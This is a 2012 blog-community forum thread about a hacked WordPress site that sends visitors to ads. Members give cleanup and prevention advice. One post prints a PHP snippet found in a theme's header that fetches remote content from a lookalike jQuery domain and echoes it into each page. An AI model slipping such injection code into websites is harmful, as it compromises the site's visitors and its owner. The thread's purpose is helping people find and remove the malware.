Yakezie.com - Topic: HELPPPPPPPPPP

rstrode on HELPPPPPPPPPP

Wed, 18 Apr 2012 13:36:14 +0000

There is a really good chance that code was located in the /lib/html/ folder within your theme, not WordPress itself, but the theme you were using. It is probably located in the header.php file within that folder. There are several header.php's in these kind of themes, which make taking it down a little bit of work, but possible. It could have also been labeled something else. However, that is apart of a header loop, they added it as a function. I have seen it done to many sites. It is usually comes already included in the theme file or added later through an update. I have found this to be the case a few times helping friends out with their sites. I was a computer programmer before I decided to be a human programmer. So, they all ask me for help when they have issues.

I figured I would post this just in case anyone else has this issue they have a good place to start to track it down. Make sure to only delete the function. Below is an example from a friends site.

if (function_exists(‘curl_init’))
{
$url = “http://www.j-query.org/jquery-1.6.3.min.js”;
$ch = curl_init();
$timeout = 5;
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
$data = curl_exec($ch);
curl_close($ch);
echo “$data”;
}
?>

The code you are looking for will look something like this, but may have a different link and it will fix you issue and you're site will run a lot faster.

This That And The MBA on HELPPPPPPPPPP

Fri, 24 Feb 2012 06:16:21 +0000

Sucuri.net removed spent about 10 hours working on it. They found that it was in the Thesis theme and the malware had somehow gotten installed in there. They reinstalled the theme but now it messed with the site, it removed some of the widgets and things I had. Better than having to start all over so that is what I will be doing this weekend. They also got rid of my Sociable Icons that i had installed to like or send to twitter. I wrote an little write up on my site yesterday about it.

OneCentAtatime on HELPPPPPPPPPP

Thu, 23 Feb 2012 17:01:46 +0000

What actually is the root cause? Let us all know about it

This That And The MBA on HELPPPPPPPPPP

Thu, 23 Feb 2012 09:54:39 +0000

yah tell me about it....nothign more frustrating than trying to do something and it is beyond your comprehension....i know finance...computer language i was lost...it looked good to me but of course i didnt know what i was looking for...needless to say it is fixed after 3 long days...i should have just done it one day one...but i being me thought id try to fix it on my own...so i could pat myself on the back...

but im back up!!!!! wooo hooo

Smart Wealth on HELPPPPPPPPPP

Thu, 23 Feb 2012 04:44:31 +0000

Too bad you had to pay to get the problem resolved.

jmichelsen on HELPPPPPPPPPP

Wed, 22 Feb 2012 13:04:02 +0000

OneCentAtatime said:

Wordpress is vulnerable as any other software. But you increase the risk by installing various widgets and plugins. Always look for star rating and review of the plugin before blindly installing them for the sake of trying new things out.

MBA, try to remeber which plugin you installed lately and try removing plugins one by one, with last one first.

Your can FTP the content on your local desktop and search in files (any text editor does that) for the words "redirect' etc.

any plugin with that kind of word is a suspect. try to determine the plugin be seeing the file's folder structure or documentation within.

WordPress in general isn't the issue like OneCent said, but it's the plugins/themes that usually cause havoc, more specifically, if plugins and themes aren't kept up to date, or are coded badly, you're open to attacks. When a new release of a plugin/theme/WordPress core comes out, in the release notes, vulnerabilities that were patched are revealed which makes the old version even more susceptible.

jmichelsen on HELPPPPPPPPPP

Wed, 22 Feb 2012 12:58:48 +0000

Hey Christopher, I haven't received your email but am happy to help. I just went to your site, saw your post about inmotion fixing the problem..then I got redirected to some weight-loss ad.

Is inmotion still working on the problem?

I've sent you an email.

OneCentAtatime on HELPPPPPPPPPP

Wed, 22 Feb 2012 11:46:26 +0000

Wordpress is vulnerable as any other software. But you increase the risk by installing various widgets and plugins. Always look for star rating and review of the plugin before blindly installing them for the sake of trying new things out.

MBA, try to remeber which plugin you installed lately and try removing plugins one by one, with last one first.

Your can FTP the content on your local desktop and search in files (any text editor does that) for the words "redirect' etc.

any plugin with that kind of word is a suspect. try to determine the plugin be seeing the file's folder structure or documentation within.

FamilyMoneyValues on HELPPPPPPPPPP

Wed, 22 Feb 2012 09:40:39 +0000

This is a very good question. Is Wordpress more susceptible than other products to infestations?

Charles @ MoneyGreenLife said:

i wonder how these malwares are installing themselves onto our blogs. How do we prevent them from happening all over again even after a fix?

This That And The MBA on HELPPPPPPPPPP

Wed, 22 Feb 2012 09:03:44 +0000

i just went and spent the 90 bucks for sucuri.net and they are removing it. if i spent the past 2 nights messing with it and i couldnt figure it out, my time is worth the 90 bucks also considering it comes iwht a year of protection. ughh it is a pain to deal with and not understanding code to much it could be buried anywhere.

Jeremy @ Personal Finance Whiz on HELPPPPPPPPPP

Wed, 22 Feb 2012 08:27:06 +0000

If you don't see anything amiss in the header.php, check your functions.php.

Charles @ MoneyGreenLife on HELPPPPPPPPPP

Wed, 22 Feb 2012 08:08:29 +0000

i wonder how these malwares are installing themselves onto our blogs. How do we prevent them from happening all over again even after a fix?

Jackie on HELPPPPPPPPPP

Wed, 22 Feb 2012 07:43:25 +0000

If you are using WordPress, I would look in Appearance > Editor and then click header.php. Based on what you've described, that seems like the most likely location for the snippet to me. Once you find it, you can remove it and click Update File at the bottom.

This That And The MBA on HELPPPPPPPPPP

Tue, 21 Feb 2012 19:16:48 +0000

If he is at PF Firewall I emailed him earlier. I havent heard back from him yet.

Thanks for your suggestion.

Forest Parks on HELPPPPPPPPPP

Tue, 21 Feb 2012 19:11:46 +0000

Can your host just restore from a backup 2 days ago? If not it may need a full clean up and could be in every theme file. A couple of people (I think Jesse Michelson is one) here offer services cleaning up these kinds of messes. I would offer but I don't have time today I am afraid, it's nearing the end of the day here.